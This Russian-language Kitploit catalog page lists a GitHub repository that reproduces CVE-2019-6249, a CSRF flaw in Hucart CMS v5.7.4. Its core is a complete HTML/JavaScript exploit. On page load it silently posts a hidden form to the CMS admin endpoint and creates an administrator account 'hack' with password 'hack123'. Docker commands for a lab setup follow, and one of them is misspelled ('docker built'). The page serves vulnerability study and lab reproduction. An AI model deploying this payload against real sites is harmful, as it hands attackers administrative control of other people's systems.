Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-6249_Hucart-cms — CVE-2019-6249 Hucart cms среда воспроизведения | Kitploit
Инструменты/GitHubGitHub/alphabugx/cve-2019-6249_hucart-cms
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubalphabugx/cve-2019-6249_hucart-cms

CVE-2019-6249_Hucart-cms

CVE-2019-6249 Hucart cms среда воспроизведения

Репозиторий
124 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-6249_Hucart cms

1. Сводка уязвимости

Название уязвимости: Hucart cms v5.7.4 CSRF уязвимость, позволяющая произвольно добавлять учетную запись администратора
Дата сообщения: 2019-01-13
Обнаружена: AllenChen ([email protected])
Домашняя страница: http://www.hucart.com/
Ссылка на ПО: http://www.hucart.com/
Версия: v5.7.4
Идентификатор CVE: CVE-2019-6249\

2. Обзор уязвимости

В версии Hucart cms v5.7.4 существует CSRF-уязвимость: после входа администратора и перехода на следующую тестовую страницу CSRF может быть добавлена учетная запись администратора с именем hack.

3. Код эксплойта

Код эксплойта: Добавляет учетную запись администратора с именем hack и паролем hack123.

root@kitploit:~
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

4. Ссылки

  • Китайский сайт заявок CVE: http://www.iwantacve.cn/index.php/archives/109/
  • Официальный сайт CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
  • exploit-db: https://www.exploit-db.com/exploits/46149

5. Воспроизведение в среде (Docker)

Выполните следующие команды в среде Docker:

root@kitploit:~
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart

Оригинальный email: [email protected]

Скачать инструмент